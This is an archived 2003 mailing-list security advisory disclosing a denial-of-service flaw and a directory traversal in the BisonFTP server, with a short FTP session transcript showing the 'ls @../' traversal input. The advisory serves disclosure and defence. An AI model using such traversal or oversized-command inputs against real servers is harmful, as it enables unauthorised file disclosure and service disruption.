[VulnWatch] [immune advisory] Mulitple vulnerabilities found in BisonFTP

From: Immune Advisory (ja@immune.dk)
Date: 02/17/03

Next message: NGSSoftware Insight Security Research: "[VulnWatch] Lotus Domino Web Server Host/Location Buffer Overflow Vulnerability (#NISR17022003a)"

Previous message: Immune Advisory: "[VulnWatch] Mulitple vulnerabilities found in BisonFTP"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Mon, 17 Feb 2003 13:16:17 +0100
From: Immune Advisory <ja@immune.dk>
To: bugs@securitytracker.com, vulnwatch@vulnwatch.org, news@securiteam.com, vuln@secunia.com, bugtraq@securityfocus.org

[immune advisory] Mulitple vulnerabilities found in BisonFTP
================================================================================
BisonFTP is a FTP daemon used on Microsoft Windows 9x/NT systems.

-[ DESCRIPTION ]----------------------------------------------------------------
I) BisonFTP is vulnerable to a DoS attack by sending ftp commands with big
data. By sending the ftp command ls or cwd with 4300 bytes or more,
BisonFTP will start 100% CPU usage until the socket is closed by the client.

II) It's possible to trick BisonFTP into revealing confidiential information
about files outside ftp root.

    ftp> ls @../
    227 Entering PASV Mode (10,10,10,10,4,126)
    150 Directory List Follows
    -rwxrwxrwx 1 user group 739577 Feb 05 2002 BisonFTP42.exe
    226 Listing complete.
    ftp> mget @../Biso
    local: BisonFTP42.exe remote: BisonFTP42.exe
    227 Entering PASV Mode (10,10,10,10,4,128)
    550 File does not exist
    ftp>

% Note that BisonFTP42.exe is NOT located in ftp root.

-[ AFFECTED VERSIONS ]----------------------------------------------------------
BisonFTP v4r2.
* Earlier versions are not tested.

-[ SOLUTION/WORKAROUND ]--------------------------------------------------------
It's not possible to get in contact with the people at http://www.bisonftp.com
anymore. I guess a new version will never be released.

Workaround, since there might not be a new version you probaly better to
install another FTP daemon.

-[ CREDIT ]---------------------------------------------------------------------
Bugs found: 15/jan 2003, by Jimmi Andersen
Vendor contacted: 11/feb 2003
Made public: 17/feb 2003
http://www.immune.dk | Immune - Angreb og forsvar af systemer

Next message: NGSSoftware Insight Security Research: "[VulnWatch] Lotus Domino Web Server Host/Location Buffer Overflow Vulnerability (#NISR17022003a)"
Previous message: Immune Advisory: "[VulnWatch] Mulitple vulnerabilities found in BisonFTP"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[immune advisory] Mulitple vulnerabilities found in BisonFTP
... BisonFTP is a FTP daemon used on Microsoft Windows 9x/NT systems. ... BisonFTP is vulnerable to a DoS attack by sending ftp commands with big ...
(Bugtraq)
[VulnWatch] Mulitple vulnerabilities found in BisonFTP
... BisonFTP is a FTP daemon used on Microsoft Windows 9x/NT systems. ... BisonFTP is vulnerable to a DoS attack by sending ftp commands with big ...
(VulnWatch)
Re: Need a kick in the Butt on FTP from AS/400 to PC or FTP Server
... OVRDBF FILETOFILE ... The INPUT file is the file that has the ftp commands including the ...
(comp.sys.ibm.as400.misc)
Re: FTP in DTS
... Do you have any sample code for command line ftp commands? ... >compatible with SQL Server 7.0 DTS too. ... >> the internet site for source and provide an ftp site on ...
(microsoft.public.sqlserver.dts)
Re: How do I get an output file after running ftp in vbs?
... > I am relatively new to VBS and this is what my code for basic ftp sub ... > ' write ftp commands in the temporary file ... > .WriteLine user ... > My ftpCommandLog file is created but it is completely empty. ...
(microsoft.public.scripting.vbscript)